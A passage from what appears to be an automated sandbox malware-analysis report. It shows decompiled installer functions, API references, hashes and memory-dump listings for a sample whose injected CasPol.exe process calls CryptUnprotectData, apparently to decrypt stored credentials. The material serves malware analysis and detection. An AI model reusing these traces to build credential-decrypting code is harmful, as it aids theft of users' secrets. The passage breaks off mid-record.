GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,76D23420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76D23420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236f4 = _t16;
							E00404E9E();
						}
						L11:
						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E1E(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044AF(0x413);
				return 0;
			}

0x004054e1
0x004054eb
0x00405507
0x00405529
0x0040552c
0x00405532
0x0040553c
0x0040553d
0x0040553f
0x00405545
0x00405545
0x0040554f
0x00000000
0x0040555d
0x00405514
0x0040554c
0x0040554c
0x00000000
0x0040554c
0x00405520
0x00405522
0x00000000
0x00405522
0x004054f1
0x00000000
0x00000000
0x004054f8
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040550C
CallWindowProcW.USER32(?,?,?,?), ref: 0040555D

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Strings

, xrefs: 004054ED

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A

Uniqueness

Uniqueness Score: -1.00%

Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x004063e3
0x004063e5
0x004063fd
0x00406402
0x00406407
0x00406445
0x00406445
0x00406409
0x0040641b
0x00406426
0x0040642c
0x00406437
0x00000000
0x00000000
0x00406437
0x0040644b

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040663C,80000002), ref: 0040641B
RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll), ref: 00406426

Strings

Call, xrefs: 004063DC

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B21() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216cc;
				_t3 = E00403B06(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216cc =  *0x4216cc & 0x00000000;
				return _t3;
			}

0x00403b22
0x00403b2a
0x00403b31
0x00403b34
0x00403b34
0x00403b36
0x00403b3b
0x00403b42
0x00403b48
0x00403b4c
0x00403b4d
0x00403b55

APIs

FreeLibrary.KERNEL32(?,76D23420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
GlobalFree.KERNEL32(?), ref: 00403B42

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405f6c
0x00405f6e
0x00405f71
0x00405f9d
0x00405f76
0x00405f7f
0x00405f84
0x00405f8f
0x00405f92
0x00405fae
0x00405f94
0x00405f9b
0x00000000
0x00405f9b
0x00405fa7
0x00405fab
0x00405fab
0x00405fa5
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 8436, Parent PID: 2916COMMON

Execution Graph

Execution Coverage:	19.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1%
Total number of Nodes:	612
Total number of Limit Nodes:	17

Executed Functions

Function 1FCEF548 Relevance: 6.8, Strings: 5, Instructions: 500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 1FCEF5C1
\, xrefs: 1FCEF787
J X<, xrefs: 1FCEF649
\, xrefs: 1FCEF74C
\, xrefs: 1FCEF691

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID: J X<$\$\$\$\
API String ID: 0-1687124498
Opcode ID: 5a55b08782210db0dc46e00797e292ac88f7fef13971d649793c584236029fc6
Instruction ID: fd92f7efa694feb4cb742acae313355efb1265e1c372c4806dabdeaff718a728
Opcode Fuzzy Hash: 5a55b08782210db0dc46e00797e292ac88f7fef13971d649793c584236029fc6
Instruction Fuzzy Hash: 8702F435B042168BCB14DF74C8946AE7BB2AFC8314F11C929D806DB395EF71AD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 20707A18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 20708085

Strings

l8d , xrefs: 20707A18

Memory Dump Source

Source File: 00000006.00000002.9118832118.0000000020700000.00000040.00000800.00020000.00000000.sdmp, Offset: 20700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20700000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: l8d
API String ID: 834300711-1077128676
Opcode ID: 759eb27024bf0fc1820c22b953d9f61372ef685fac9ba0bddc97b561c3707268
Instruction ID: 142b9c1e2a41476652264c27e9a6030e890de4f7c158a97d4c8e2cfca80aa89f
Opcode Fuzzy Hash: 759eb27024bf0fc1820c22b953d9f61372ef685fac9ba0bddc97b561c3707268
Instruction Fuzzy Hash: A41126B28003099FCB10CF99D844BEEBFF5EF48320F148419E658A7610D379A954DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 2063E990 Relevance: 1.7, APIs: 1, Instructions: 180
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2063E9D1

Memory Dump Source

Source File: 00000006.00000002.9118217387.0000000020630000.00000040.00000800.00020000.00000000.sdmp, Offset: 20630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20630000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 846f24c24cf94732d75989de0147333452096c49c439c3a395f879a6b6b0b995
Instruction ID: fd6bb2d12e0c6bc7da6207f56b7a782b39d8fed4c6fbcb81295fdb0eb6cc8c6b
Opcode Fuzzy Hash: 846f24c24cf94732d75989de0147333452096c49c439c3a395f879a6b6b0b995
Instruction Fuzzy Hash: B1618D34A04219DBCB04DBF4C998BAEB7F2EF88704F108429D512A7294DF39AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 20708018 Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 20708085

Memory Dump Source

Source File: 00000006.00000002.9118832118.0000000020700000.00000040.00000800.00020000.00000000.sdmp, Offset: 20700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20700000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 3e388b57aa215ee55dc6fc9e019ddfcb31eeec59f27bfd686ca1a0479f8b6c19
Instruction ID: 5c6b1f0cefd42abaa9d6acb3e69c5baa1701d72572fc965ac89089e5b67135dd
Opcode Fuzzy Hash: 3e388b57aa215ee55dc6fc9e019ddfcb31eeec59f27bfd686ca1a0479f8b6c19
Instruction Fuzzy Hash: 1B2147B28002499FCB11CF99D444BEEBFF1EF58320F148419E554A7610C3799994CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A9890 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\VXl, xrefs: 1D2A9B47

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID: \VXl
API String ID: 0-4274571051
Opcode ID: 118f63895b3e8689d7a7b302f92e004f1fc39eb555d51f1a72375245d69de19c
Instruction ID: de39eaf98525ad88d7ae8804416d9d39a25f4691e9cf58131402e597a96aba8f
Opcode Fuzzy Hash: 118f63895b3e8689d7a7b302f92e004f1fc39eb555d51f1a72375245d69de19c
Instruction Fuzzy Hash: 66B15174F4421ADFDB00CFAAC8817AEBBF2FF88304F618529D425A7654DB749845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1FCEBFA8 Relevance: 1.3, Instructions: 1279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51cfdfbaf45c9eb566c05607b1f3e23419b1d6f967419f3330a87eb4c7bcd13c
Instruction ID: 8d9dfecf2229b5be7b55b802b8f12582a4abc50ccb755af99a69d814bc70f502
Opcode Fuzzy Hash: 51cfdfbaf45c9eb566c05607b1f3e23419b1d6f967419f3330a87eb4c7bcd13c
Instruction Fuzzy Hash: 43B27C34B043148FCB15DB78C89876DBBB2EF89310F5984AAE50ADB351DB35AC46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A6B63 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cbf9fa1e0f6e89e563dcca9df53ba1de73e9385a063f5a2d510bd798d503ef4
Instruction ID: 606d82842b8f4e78ee3b01ecc48efe83b6a79bf8e6631ec1daafd101789fdde6
Opcode Fuzzy Hash: 9cbf9fa1e0f6e89e563dcca9df53ba1de73e9385a063f5a2d510bd798d503ef4
Instruction Fuzzy Hash: D591B334B042248BDF19DB75865466FBBB3BFC8715B06C569D526EB284CF389C01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA160 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69a91f067435f70e721228a5aeab46188ee986a0ce279add66f3104b5d2748f
Instruction ID: a895e820185b460911d0e7db604c2ff2b0b5af7f703c202716a54c7c1b00ed76
Opcode Fuzzy Hash: f69a91f067435f70e721228a5aeab46188ee986a0ce279add66f3104b5d2748f
Instruction Fuzzy Hash: A4B16070E4421ACFDB00CFA5D8857AEBBF2FF88314F248529E425E7654EB759845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1FCEE048 Relevance: 3.2, Strings: 2, Instructions: 674
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Dq@i, xrefs: 1FCEE6ED
0o@i, xrefs: 1FCEE6E1

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID: 0o@i$Dq@i
API String ID: 0-454074288
Opcode ID: ba4667d8a5fff13aa3852296132ad53fa754999843bef31b92f377b26aaf7d1b
Instruction ID: dab22f406e26a7c2c2a3d0ba2746066ab8a340e90494dbbe5b439d7285af85a1
Opcode Fuzzy Hash: ba4667d8a5fff13aa3852296132ad53fa754999843bef31b92f377b26aaf7d1b
Instruction Fuzzy Hash: BF32BF35B043148FCB04DB78C89469DBBF2AF89354B168579E906DB3A2EB31EC09CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AD328 Relevance: 2.7, Strings: 2, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C"O^, xrefs: 1D2AD415
3"O^, xrefs: 1D2AD498

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID: 3"O^$C"O^
API String ID: 0-1810729159
Opcode ID: 5f7231b714a875674f1d37028280aeba6bc0bfcd8c2d9b27ac77de12ff0d7180
Instruction ID: d1a7206cca21e42d93a29ca306b2e700c66d3c96e868fa2063272f6e4485ac55
Opcode Fuzzy Hash: 5f7231b714a875674f1d37028280aeba6bc0bfcd8c2d9b27ac77de12ff0d7180
Instruction Fuzzy Hash: D561F4746482544FCB01EB78845426D7FB2EFC6314B45447AC166DBBA0EF759809CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A9ECF Relevance: 2.7, Strings: 2, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\VXl, xrefs: 1D2AA09A
\VXl, xrefs: 1D2A9F47

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID: \VXl$\VXl
API String ID: 0-1709680015
Opcode ID: db4efa7dc2f5efc5eb3e43f18ba0bdc4fd4f1387190fda734696e31318ae5d8e
Instruction ID: 599884b7a963c8fdd2469966c00348f3232f4deee900567145e0d9f20cb07b5a
Opcode Fuzzy Hash: db4efa7dc2f5efc5eb3e43f18ba0bdc4fd4f1387190fda734696e31318ae5d8e
Instruction Fuzzy Hash: 50716C70E4421ADFDF10CFA9C8807EEBBF1EF88704F248029E425A7654DB759845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A9ED8 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\VXl, xrefs: 1D2AA09A
\VXl, xrefs: 1D2A9F47

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID: \VXl$\VXl
API String ID: 0-1709680015
Opcode ID: d3bf9f9aa92332cf6ad2d8e8f7666c65bb7fb5c5eaa4d6ab82278c2762963f40
Instruction ID: c7bed82d4b789f7c5b6ff83079ed06e3018fb52a38b48de848ce46201a4a1003
Opcode Fuzzy Hash: d3bf9f9aa92332cf6ad2d8e8f7666c65bb7fb5c5eaa4d6ab82278c2762963f40
Instruction Fuzzy Hash: 6C714B70E442199FDF10CFA9C8817EEBBF2EF88714F248029E425A7654EB759845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AD3CD Relevance: 2.6, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C"O^, xrefs: 1D2AD415
3"O^, xrefs: 1D2AD498

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID: 3"O^$C"O^
API String ID: 0-1810729159
Opcode ID: e542a9f7ec65572a5e2ed71a4213a43b3a369a29c4fa91a990894b5d020874d3
Instruction ID: d074a4a483938bf793603a0a303f8b6f9e24d62246293cf6b55645e3b7ae833b
Opcode Fuzzy Hash: e542a9f7ec65572a5e2ed71a4213a43b3a369a29c4fa91a990894b5d020874d3
Instruction Fuzzy Hash: 4821A2387482108BCB14FB78905426D7BA3EFD6304B45097AD167DBBA0EF75A805DB53

Uniqueness

Uniqueness Score: -1.00%

Function 2070BB68 Relevance: 1.7, APIs: 1, Instructions: 169
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2070BC1F

Memory Dump Source

Source File: 00000006.00000002.9118832118.0000000020700000.00000040.00000800.00020000.00000000.sdmp, Offset: 20700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20700000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0895d443dc5e67b2f109a408ed89e168a2015611ab1b49492fde03c4dfc9c669
Instruction ID: 85c09e6355a31df876ae2760cec4cf66d31199943fa01065c7649f7b5b629ecb
Opcode Fuzzy Hash: 0895d443dc5e67b2f109a408ed89e168a2015611ab1b49492fde03c4dfc9c669
Instruction Fuzzy Hash: 6251C334B043059FCB04DBB4C884AAEBBF6AF89314F15857AD511DB251EF70E919CB61

Uniqueness

Uniqueness Score: -1.00%

Function 2070BBC0 Relevance: 1.6, APIs: 1, Instructions: 148
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2070BC1F

Memory Dump Source

Source File: 00000006.00000002.9118832118.0000000020700000.00000040.00000800.00020000.00000000.sdmp, Offset: 20700000, based on PE: false

Joe Sandbox IDA Plugin

